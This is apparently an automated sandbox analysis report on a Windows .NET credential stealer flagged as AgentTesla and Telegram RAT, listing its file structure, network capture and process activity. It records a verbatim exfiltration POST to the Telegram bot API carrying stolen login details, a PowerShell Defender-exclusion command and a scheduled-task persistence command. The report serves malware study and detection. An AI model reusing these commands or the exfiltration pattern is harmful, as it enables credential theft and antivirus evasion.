                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbfc100x4b.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x1a358.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xdc0000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xbfbcc0x1c.text
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000xbdc640xbde00False0.88429245186data7.75075398615IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0xc00000x1a3580x1a400False0.156454613095data4.28258053659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0xdc0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountry
                                                                                          RT_ICON0xc01900x94a8data
                                                                                          RT_ICON0xc96380x10828data
                                                                                          RT_GROUP_ICON0xd9e600x22data
                                                                                          RT_GROUP_ICON0xd9e840x14data
                                                                                          RT_VERSION0xd9e980x2d4data
                                                                                          RT_MANIFEST0xda16c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Version Infos

                                                                                          DescriptionData
                                                                                          Translation0x0000 0x04b0
                                                                                          LegalCopyright
                                                                                          Assembly Version1.0.0.0
                                                                                          InternalNamePARAMD.exe
                                                                                          FileVersion1.0.0.0
                                                                                          CompanyName
                                                                                          LegalTrademarks
                                                                                          Comments
                                                                                          ProductName
                                                                                          ProductVersion1.0.0.0
                                                                                          FileDescription
                                                                                          OriginalFilenamePARAMD.exe

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          May 27, 2022 20:50:47.403879881 CEST49764443192.168.2.4149.154.167.220
                                                                                          May 27, 2022 20:50:47.403924942 CEST44349764149.154.167.220192.168.2.4
                                                                                          May 27, 2022 20:50:47.404026031 CEST49764443192.168.2.4149.154.167.220
                                                                                          May 27, 2022 20:50:47.504790068 CEST49764443192.168.2.4149.154.167.220
                                                                                          May 27, 2022 20:50:47.504827023 CEST44349764149.154.167.220192.168.2.4
                                                                                          May 27, 2022 20:50:47.572382927 CEST44349764149.154.167.220192.168.2.4
                                                                                          May 27, 2022 20:50:47.572501898 CEST49764443192.168.2.4149.154.167.220
                                                                                          May 27, 2022 20:50:47.577042103 CEST49764443192.168.2.4149.154.167.220
                                                                                          May 27, 2022 20:50:47.577081919 CEST44349764149.154.167.220192.168.2.4
                                                                                          May 27, 2022 20:50:47.577377081 CEST44349764149.154.167.220192.168.2.4
                                                                                          May 27, 2022 20:50:47.710206985 CEST49764443192.168.2.4149.154.167.220
                                                                                          May 27, 2022 20:50:49.022193909 CEST49764443192.168.2.4149.154.167.220
                                                                                          May 27, 2022 20:50:49.049877882 CEST44349764149.154.167.220192.168.2.4
                                                                                          May 27, 2022 20:50:49.056047916 CEST49764443192.168.2.4149.154.167.220
                                                                                          May 27, 2022 20:50:49.096498966 CEST44349764149.154.167.220192.168.2.4
                                                                                          May 27, 2022 20:50:49.180016994 CEST44349764149.154.167.220192.168.2.4
                                                                                          May 27, 2022 20:50:49.180107117 CEST44349764149.154.167.220192.168.2.4
                                                                                          May 27, 2022 20:50:49.180901051 CEST49764443192.168.2.4149.154.167.220
                                                                                          May 27, 2022 20:50:49.181226969 CEST49764443192.168.2.4149.154.167.220

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          May 27, 2022 20:50:47.337369919 CEST5650953192.168.2.48.8.8.8
                                                                                          May 27, 2022 20:50:47.356251001 CEST53565098.8.8.8192.168.2.4

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                          May 27, 2022 20:50:47.337369919 CEST192.168.2.48.8.8.80xc38eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                          May 27, 2022 20:50:47.356251001 CEST8.8.8.8192.168.2.40xc38eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                          HTTP Request Dependency Graph

                                                                                          • api.telegram.org

                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          0192.168.2.449764149.154.167.220443C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2022-05-27 18:50:49 UTC0OUTPOST /bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument HTTP/1.1
                                                                                          Content-Type: multipart/form-data; boundary=---------------------------8da40272c67fce7
                                                                                          Host: api.telegram.org
                                                                                          Content-Length: 993
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          2022-05-27 18:50:49 UTC0INHTTP/1.1 100 Continue
                                                                                          2022-05-27 18:50:49 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 34 30 32 37 32 63 36 37 66 63 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 36 35 31 36 36 36 34 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 34 30 32 37 32 63 36 37 66 63 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 33 34 37 36 38 38 0a 4f 53 46 75 6c 6c
                                                                                          Data Ascii: -----------------------------8da40272c67fce7Content-Disposition: form-data; name="chat_id"5365166645-----------------------------8da40272c67fce7Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/347688OSFull
                                                                                          2022-05-27 18:50:49 UTC1INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Fri, 27 May 2022 18:50:49 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 633
                                                                                          Connection: close
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                          {"ok":true,"result":{"message_id":319,"from":{"id":5279079600,"is_bot":true,"first_name":"Linny","username":"linn98_bot"},"chat":{"id":5365166645,"first_name":"Lingard","last_name":"Lynny","username":"lingardlynny","type":"private"},"date":1653677449,"document":{"file_name":"user-347688 2022-05-27 09-22-09.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBP2KRHYlbxwXmQOy711P1s1ORLFN3AAIVCwACF0eJUBAf65j0CTMRJAQ","file_unique_id":"AgADFQsAAhdHiVA","file_size":423},"caption":"New PW Recovered!\n\nUser Name: user/347688\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:20:49:40
                                                                                          Start date:27/05/2022
                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe"
                                                                                          Imagebase:0x1f0000
                                                                                          File size:886272 bytes
                                                                                          MD5 hash:ADEC785F7CBAA5AF9C8C7FA50CF91BAA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.352372028.0000000007080000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.346224005.0000000002864000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.346406018.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.346406018.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          General

                                                                                          Target ID:9
                                                                                          Start time:20:50:07
                                                                                          Start date:27/05/2022
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HksvOcmoc.exe
                                                                                          Imagebase:0x12b0000
                                                                                          File size:430592 bytes
                                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:high

                                                                                          General

                                                                                          Target ID:10
                                                                                          Start time:20:50:08
                                                                                          Start date:27/05/2022
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff647620000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Target ID:12
                                                                                          Start time:20:50:10
                                                                                          Start date:27/05/2022
                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HksvOcmoc" /XML "C:\Users\user\AppData\Local\Temp\tmpCB43.tmp
                                                                                          Imagebase:0xa90000
                                                                                          File size:185856 bytes
                                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Target ID:14
                                                                                          Start time:20:50:11
                                                                                          Start date:27/05/2022
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff647620000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Target ID:15
                                                                                          Start time:20:50:12
                                                                                          Start date:27/05/2022
                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                                                                                          Imagebase:0xa40000
                                                                                          File size:886272 bytes
                                                                                          MD5 hash:ADEC785F7CBAA5AF9C8C7FA50CF91BAA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000000.338699898.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000000.338699898.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000000.327062889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000000.327062889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.521016859.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.521016859.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000000.338146222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000000.338146222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:15.1%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:59
                                                                                            Total number of Limit Nodes:9
                                                                                            execution_graph 12868 5885b5f 12869 5885b65 12868->12869 12872 58a1c80 12869->12872 12873 58a1c97 12872->12873 12876 58a08e8 12873->12876 12877 58a08f3 12876->12877 12882 58a1e94 12877->12882 12879 58a2442 12886 58abb68 12879->12886 12880 589921f 12883 58a1e9f 12882->12883 12891 58a1eb4 12883->12891 12885 58a2571 12885->12879 12887 58abb88 12886->12887 12889 58abbf7 12886->12889 12888 58abbbc 12887->12888 12912 58abc80 12887->12912 12888->12880 12889->12880 12893 58a1ebf 12891->12893 12892 58a25e4 12892->12885 12893->12892 12894 58a2627 12893->12894 12900 58a2647 12893->12900 12902 58a1fbc 12894->12902 12896 58a262c 12896->12885 12897 58a269c 12897->12885 12898 58a2683 12898->12897 12899 58a1fbc 2 API calls 12898->12899 12899->12897 12900->12898 12901 58a1eb4 2 API calls 12900->12901 12901->12898 12903 58a1fc7 12902->12903 12906 58a8080 12903->12906 12907 58a808b 12906->12907 12908 58a89d5 GetSystemMetrics 12907->12908 12909 58a8a50 GetSystemMetrics 12908->12909 12910 58a8a49 12908->12910 12911 58a88bb 12909->12911 12910->12909 12911->12896 12913 58abcab 12912->12913 12914 58abca4 12912->12914 12918 58abcd2 12913->12918 12919 58aa32c 12913->12919 12914->12887 12917 58aa32c GetCurrentThreadId 12917->12918 12918->12887 12920 58aa337 12919->12920 12921 58abfef GetCurrentThreadId 12920->12921 12922 58abcc8 12920->12922 12921->12922 12922->12917 12923 ae4450 12924 ae446d 12923->12924 12925 ae447a 12924->12925 12927 ae45b8 12924->12927 12928 ae45c2 12927->12928 12930 ae4617 12927->12930 12933 ae46a8 12928->12933 12938 ae46b8 12928->12938 12930->12925 12934 ae46b7 12933->12934 12935 ae45e7 12933->12935 12937 ae47bc 12934->12937 12942 ae4224 12934->12942 12935->12925 12940 ae46df 12938->12940 12939 ae47bc 12939->12939 12940->12939 12941 ae4224 CreateActCtxA 12940->12941 12941->12939 12943 ae5748 CreateActCtxA 12942->12943 12945 ae580b 12943->12945

                                                                                            Executed Functions

                                                                                            Function 00AE6E18 Relevance: .2, Instructions: 193COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1015 ae6e18-ae6e1d 1016 ae6e1f-ae6e47 1015->1016 1017 ae6dc9-ae6dd0 1015->1017 1021 ae6e4e-ae70b4 1016->1021 1022 ae6e49 1016->1022 1018 ae6dd7-ae6e04 call ae05d8 1017->1018 1019 ae6dd2 1017->1019 1029 ae6dea-ae6e11 1018->1029 1019->1018 1022->1021
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343735632.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_ae0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f1a7e5c7f517b34d6b046ae492d4c9d2df525a5cd8d9c028d00a70a3358610c8
                                                                                            • Instruction ID: e83258940252cb043f9c944a931088f642166d7b681b63dfcb999e380d7e3966
                                                                                            • Opcode Fuzzy Hash: f1a7e5c7f517b34d6b046ae492d4c9d2df525a5cd8d9c028d00a70a3358610c8
                                                                                            • Instruction Fuzzy Hash: 04716778D055488FDB45DFAAE84169EBBF2BBCD308F04C529D004AB278EB71590BAB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE573C Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 15 ae573c-ae5809 CreateActCtxA 17 ae580b-ae5811 15->17 18 ae5812-ae586c 15->18 17->18 25 ae586e-ae5871 18->25 26 ae587b-ae587f 18->26 25->26 27 ae5890 26->27 28 ae5881-ae588d 26->28 30 ae5891 27->30 28->27 30->30
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00AE57F9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343735632.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_ae0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 5b7c88063a68768ec39ad63473daa3ef4a915a14bdc5a3c446aa3e6e0e40f577
                                                                                            • Instruction ID: b052c7eb4b5736cf1320cc7a3fb25638c2f333b8f195ec6dd844b93a2b355f4c
                                                                                            • Opcode Fuzzy Hash: 5b7c88063a68768ec39ad63473daa3ef4a915a14bdc5a3c446aa3e6e0e40f577
                                                                                            • Instruction Fuzzy Hash: 6641F370C0465CDBDB24CFA9D8847CEBBB5FF88308F108069D508AB255DB756946DF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE4224 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 31 ae4224-ae5809 CreateActCtxA 34 ae580b-ae5811 31->34 35 ae5812-ae586c 31->35 34->35 42 ae586e-ae5871 35->42 43 ae587b-ae587f 35->43 42->43 44 ae5890 43->44 45 ae5881-ae588d 43->45 47 ae5891 44->47 45->44 47->47
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00AE57F9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343735632.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_ae0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 95b389cb342906a7fcbdf6131ffebdd589e8ebb24671d09cd529768969cf3dd6
                                                                                            • Instruction ID: 4ca6b472f1510cf7355b5915dee4381b5b204b1076d69708d502be2f11dc035a
                                                                                            • Opcode Fuzzy Hash: 95b389cb342906a7fcbdf6131ffebdd589e8ebb24671d09cd529768969cf3dd6
                                                                                            • Instruction Fuzzy Hash: 9B41F270C0465CCBDB24CFAAD884BCEBBB5BF88308F108469D408AB255DBB56946CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A3D3EC Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 39c464f874942b25d423147f29ddc75a58cd0f9f4df60f96cfc7f5e5717f5ad3
                                                                                            • Instruction ID: 9cca85791b4578acc36566597255d7ff9e4c148cb6b297bef4d9ce7b45f5a1d2
                                                                                            • Opcode Fuzzy Hash: 39c464f874942b25d423147f29ddc75a58cd0f9f4df60f96cfc7f5e5717f5ad3
                                                                                            • Instruction Fuzzy Hash: F72107B1504244EFDB05DF14E9C0B2ABF65FB94324F24C669F9094B24AC336E856D7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A3D4D8 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 06e8d29e9bd935d334aa711cdf7d24074f4e154987860d0109339aa92d0d74f9
                                                                                            • Instruction ID: f40c33afeef230c0413e96d675b77f7befaa0b7690d9874152d4b8e66b2ff127
                                                                                            • Opcode Fuzzy Hash: 06e8d29e9bd935d334aa711cdf7d24074f4e154987860d0109339aa92d0d74f9
                                                                                            • Instruction Fuzzy Hash: 8B2137B1604244DFCB01CF14E9C0B2ABF75FB88328F248569F9054B24AC336D856DBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A4D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343410847.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a4d000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 063e5ffd10c21b1e3a56d3ad9285fa95e1448e42f24e3afe5124415bc9d6af58
                                                                                            • Instruction ID: 158f8b3c78772fd71e043e97f89bab96a88d226fe9867bcc68590fb1880fd979
                                                                                            • Opcode Fuzzy Hash: 063e5ffd10c21b1e3a56d3ad9285fa95e1448e42f24e3afe5124415bc9d6af58
                                                                                            • Instruction Fuzzy Hash: 072137B9604244EFCB01CF10C5C0B66BBA1FBC4318F20CA6DE9095B346C3B6D806CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A4D01C Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343410847.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a4d000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ba8fe942cad666c0aae49c56295fc76190f118d93a78e876db7bb07e8c5e7172
                                                                                            • Instruction ID: 375a5e7c0d196895e89b639f8ebd3bd4b6c40eab1578f995ac6d707e040f2c94
                                                                                            • Opcode Fuzzy Hash: ba8fe942cad666c0aae49c56295fc76190f118d93a78e876db7bb07e8c5e7172
                                                                                            • Instruction Fuzzy Hash: 8A210479604244DFCB14DF24D9C4B26BB65FBC4318F24C9ADE90A4B34AC33AD847DA62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A3D3E7 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
